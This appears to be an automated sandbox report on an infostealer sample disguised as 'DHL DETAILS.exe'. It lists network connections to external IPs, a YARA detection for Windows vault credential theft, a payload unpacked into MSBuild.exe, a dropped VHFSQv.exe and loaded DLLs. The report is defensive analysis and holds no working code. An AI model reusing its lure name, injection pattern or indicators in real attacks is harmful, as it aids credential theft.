Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62473
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62474
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62476
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62477
Source: unknown	Network traffic detected: HTTP traffic on port 53588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62251
Source: unknown	Network traffic detected: HTTP traffic on port 50952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50022
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53536
Source: unknown	Network traffic detected: HTTP traffic on port 55781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63576
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62248
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55969
Source: unknown	Network traffic detected: HTTP traffic on port 50596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 62867 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57262 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63057 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50412 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62494
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62253
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64430
Source: unknown	Network traffic detected: HTTP traffic on port 63173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 61460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64453 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56827
Source: unknown	Network traffic detected: HTTP traffic on port 50033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64451
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51376
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56824
Source: unknown	Network traffic detected: HTTP traffic on port 59249 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51377
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51378
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51380
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 61177
Source: unknown	Network traffic detected: HTTP traffic on port 51270 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64448
Source: unknown	Network traffic detected: HTTP traffic on port 64070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54497
Source: unknown	Network traffic detected: HTTP traffic on port 50357 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57524
Source: unknown	Network traffic detected: HTTP traffic on port 57178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55083 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54491 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64070
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56206
Source: unknown	Network traffic detected: HTTP traffic on port 53962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50909
Source: unknown	Network traffic detected: HTTP traffic on port 55810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59215 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64082
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50912
Source: unknown	Network traffic detected: HTTP traffic on port 60040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56219
Source: unknown	Network traffic detected: HTTP traffic on port 49202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56216
Source: unknown	Network traffic detected: HTTP traffic on port 60538 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50919
Source: unknown	Network traffic detected: HTTP traffic on port 63936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64093
Source: unknown	Network traffic detected: HTTP traffic on port 54726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54669 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55100 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64097
Source: unknown	Network traffic detected: HTTP traffic on port 51716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62906
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62907
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62908
Source: unknown	Network traffic detected: HTTP traffic on port 59633 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56226
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56227
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62901
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62904
Source: unknown	Network traffic detected: HTTP traffic on port 50866 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54154 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63170
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65352
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65111
Source: unknown	Network traffic detected: HTTP traffic on port 53751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53129
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58810
Source: unknown	Network traffic detected: HTTP traffic on port 56341 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51192
Source: unknown	Network traffic detected: HTTP traffic on port 50075 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63169
Source: unknown	Network traffic detected: HTTP traffic on port 63934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65347
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65348
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65106
Source: unknown	Network traffic detected: HTTP traffic on port 62413 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51197
Source: unknown	Network traffic detected: HTTP traffic on port 56028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55795
Source: unknown	Network traffic detected: HTTP traffic on port 56716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56891
Source: unknown	Network traffic detected: HTTP traffic on port 59687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56890
Source: unknown	Network traffic detected: HTTP traffic on port 55969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63176
Source: unknown	Network traffic detected: HTTP traffic on port 62248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65355
Source: unknown	Network traffic detected: HTTP traffic on port 59771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 55795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50493 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53147
Source: unknown	Network traffic detected: HTTP traffic on port 50856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51377 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57501
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53149
Source: unknown	Network traffic detected: HTTP traffic on port 50949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53151
Source: unknown	Network traffic detected: HTTP traffic on port 60794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 65127
Source: unknown	Network traffic detected: HTTP traffic on port 64082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54005
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53157
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54003
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53159
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54006
Source: unknown	Network traffic detected: HTTP traffic on port 53960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54491
Source: unknown	Network traffic detected: HTTP traffic on port 59385 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55100
Source: unknown	Network traffic detected: HTTP traffic on port 61177 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55101
Source: unknown	Network traffic detected: HTTP traffic on port 51706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 62831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54494
Source: unknown	Network traffic detected: HTTP traffic on port 56132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54493
Source: unknown	Network traffic detected: HTTP traffic on port 59643 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63281 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51706
Source: unknown	Network traffic detected: HTTP traffic on port 62813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50859
Source: unknown	Network traffic detected: HTTP traffic on port 49359 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56165
Source: unknown	Network traffic detected: HTTP traffic on port 56216 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57494
Source: unknown	Network traffic detected: HTTP traffic on port 61969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56858 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50866
Source: unknown	Network traffic detected: HTTP traffic on port 50314 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 65335 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55086
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55083
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63934
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55089
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57262
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59683
Source: unknown	Network traffic detected: HTTP traffic on port 55086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59680
Source: unknown	Network traffic detected: HTTP traffic on port 63027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55082
Source: unknown	Network traffic detected: HTTP traffic on port 59219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53157 -> 443

Source: unknown	HTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51523 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:51524 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:53536 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:53639 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55292 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.114.3:443 -> 192.168.2.5:55293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57177 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:57178 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:59163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:59424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:60799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:63279 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.113.3:443 -> 192.168.2.5:63403 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:49207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:49301 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.140.87:443 -> 192.168.2.5:56165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 222.255.238.159:443 -> 192.168.2.5:62819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 102.223.20.217:443 -> 192.168.2.5:63576 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 16.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0158D220	16_2_0158D220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0158ABA1	16_2_0158ABA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_01584A98	16_2_01584A98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_01589ED8	16_2_01589ED8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_01583E80	16_2_01583E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_015841C8	16_2_015841C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0675A068	16_2_0675A068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0675BB57	16_2_0675BB57
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0675BB58	16_2_0675BB58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_06785AD8	16_2_06785AD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_067842C0	16_2_067842C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_06789147	16_2_06789147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0678E118	16_2_0678E118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_06780F05	16_2_06780F05
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_06784D60	16_2_06784D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_067853E0	16_2_067853E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 16_2_0678C3B8	16_2_0678C3B8
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Code function: 24_2_01731CC0	24_2_01731CC0
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Code function: 24_2_01732788	24_2_01732788
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Code function: 24_2_01735A41	24_2_01735A41
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Code function: 32_2_015E1CC0	32_2_015E1CC0
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Code function: 32_2_015E2788	32_2_015E2788
Source: C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe	Code function: 32_2_015E5A41	32_2_015E5A41

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 436 -p 43312 -ip 43312

Source: DHL DETAILS.exe	Static PE information: No import functions for PE file found
Source: svchost.exe.0.dr	Static PE information: No import functions for PE file found

Source: DHL DETAILS.exe, 00000000.00000000.2093570992.0000028F61F62000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameAssalamAlaikum.exe> vs DHL DETAILS.exe
Source: DHL DETAILS.exe	Binary or memory string: OriginalFilenameAssalamAlaikum.exe> vs DHL DETAILS.exe

Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DHL DETAILS.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
